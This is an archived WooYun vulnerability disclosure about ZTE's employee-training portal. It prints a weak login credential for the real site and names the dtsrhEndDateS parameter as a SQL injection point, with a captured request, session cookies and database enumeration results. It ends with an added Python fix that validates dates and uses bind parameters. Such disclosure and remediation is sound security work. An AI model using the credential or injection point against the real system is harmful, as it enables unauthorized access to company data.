WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
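2015-09-12: Details reported to the vendor, awaiting vendor handling
2015-09-14: Vendor confirmed; details disclosed to the vendor only
2015-09-24: Details disclosed to core white hats and experts in the relevant field
2015-10-04: Details disclosed to regular white hats
2015-10-14: Details disclosed to trainee white hats
2015-10-29: Details disclosed to the public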
2333333
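URL: http://its.zte.com.cn/univ/login.aspx
Logged in with a weak password: 6396000452/123456
After entering the back end, there is a POST-based injection in the page for configuring mentor-apprentice relationships.
The date field is the injection point.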
POST /univ/employeetrain/NewcomerCultivate/SetTeacherStudent.aspx HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://its.zte.com.cn/univ/employeetrain/NewcomerCultivate/SetTeacherStudent.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3; GWX:QUALIFIED)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: its.zte.com.cn
Content-Length: 891
Pragma: no-cache
Cookie: LoginTicket=; ASP.NET_SessionId=ve3lxxywaa1c5jrr5u0fic45; EdoorCulture=CurCulture=1&CurrentCulture=zh-CN; sessioncookieid=2015912152758888; ssocookieid=201508100956452015912152758888; username=10095645

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE_KEY=VIEWSTATE_ve3lxxywaa1c5jrr5u0fic45_192.168.28.70_635776688149445540&__VIEWSTATE=&__EVENTVALIDATION=%2FwEWIAL%2BraDpAgKz8dy8BQL0%2B4mHAgKVhO%2FXDgKN%2FuDeCgKoqY%2FDDwLp4Yr6AgLbxeClDQLB79GlBALbibmnDQK42KGWCgKq2KGWCgK3gv1tAqGW0fwNAq%2FznMIDAq%2FziOcKAq%2Fz9IsCAq%2Fz4LAJAq%2Fz7K4GAtrH29UGAq2S5aIKApfCh40LAtXujOkHAuDIlpkJAuTI1poJAuXI1poJAubI1poJAufI1poJAuDI1poJAsKJsc0OAuqSpeUFAtm2xxub8%2Blv7jaIZXMQqx0UyPb5vV2Yzj3%2FA7p7oJgUkfuFSw%3D%3D&txtUserId=20150810095645&txtLanguage=zh_CN&_ctl8=%2Funiv%2Femployeetrain%2FNewcomerCultivate%2FSetTeacherStudent.aspx&dtsRegDateS=&dtsRegDateE=&dtsrhStartDateS=&dtsrhStartDateE=&dtsrhEndDateS=2015-09-01&dtsrhEndDateE=2015-09-26&txtNameAndId=&txtDeptName=&btnSelect=%E6%9F%A5%E8%AF%A2&ztegriTeacherAndStudent%3A_ctl4%3A_numPageSizeFooter_1=10&ztegriTeacherAndStudent%3A_ctl4%3A_numPageFooter_1=1&querydepartno=
The dtsrhEndDateS parameter is the injection point; 13 databases are involved.
The current database contains more than 300 tables.
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET, Nginx
back-end DBMS: Oracle
Database: EMPTRAIN
[312 tables]
Filtering
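The filtering fix recommended above, in concrete form, as an added example that is not code from the original report or from the affected application: the two end-date fields from the captured request are parsed strictly as YYYY-MM-DD and reach the query only as bind parameters. The table teacher_student, its columns, and the use of sqlite3 in place of Oracle are assumptions made so the sketch runs offline.

```python
import sqlite3
from datetime import datetime
from urllib.parse import parse_qs

DATE_FIELDS = ("dtsrhEndDateS", "dtsrhEndDateE")  # field names from the request above


def parse_date_fields(body: str) -> dict:
    """Return validated ISO dates from a urlencoded form body, or raise ValueError."""
    form = parse_qs(body, keep_blank_values=True)
    dates = {}
    for name in DATE_FIELDS:
        raw = form.get(name, [""])[0]
        try:
            parsed = datetime.strptime(raw, "%Y-%m-%d").date()
        except ValueError:
            raise ValueError(f"{name}: not a date") from None
        # strptime alone accepts "2015-9-1"; the round trip enforces YYYY-MM-DD.
        if parsed.isoformat() != raw:
            raise ValueError(f"{name}: not in YYYY-MM-DD form")
        dates[name] = parsed.isoformat()
    return dates


def search_relationships(conn, body: str) -> list:
    """Query with bind parameters, so user input never becomes SQL text."""
    d = parse_date_fields(body)
    sql = ("SELECT student FROM teacher_student "
           "WHERE end_date BETWEEN ? AND ? ORDER BY student")
    return [r[0] for r in conn.execute(sql, (d["dtsrhEndDateS"], d["dtsrhEndDateE"]))]


def demo_db():
    """Constructed in-memory table standing in for the real Oracle schema (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE teacher_student (student TEXT, end_date TEXT)")
    conn.executemany("INSERT INTO teacher_student VALUES (?, ?)",
                     [("s1", "2015-09-10"), ("s2", "2015-10-02")])
    return conn


if __name__ == "__main__":
    conn = demo_db()
    # Constructed bodies: the first carries the dates from the report, the second a stray quote.
    print(search_relationships(conn, "dtsrhEndDateS=2015-09-01&dtsrhEndDateE=2015-09-26"))
    try:
        search_relationships(conn, "dtsrhEndDateS=2015-09-01%27&dtsrhEndDateE=2015-09-26")
    except ValueError as exc:
        print("rejected:", exc)
```

In this sketch both fields are required; a form that allows an empty date would treat the empty string as "no bound" before parsing, not pass it through.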
Severity: High
Vulnerability Rank: 19
Confirmation time: 2015-09-14 08:54
Thanks~
None yet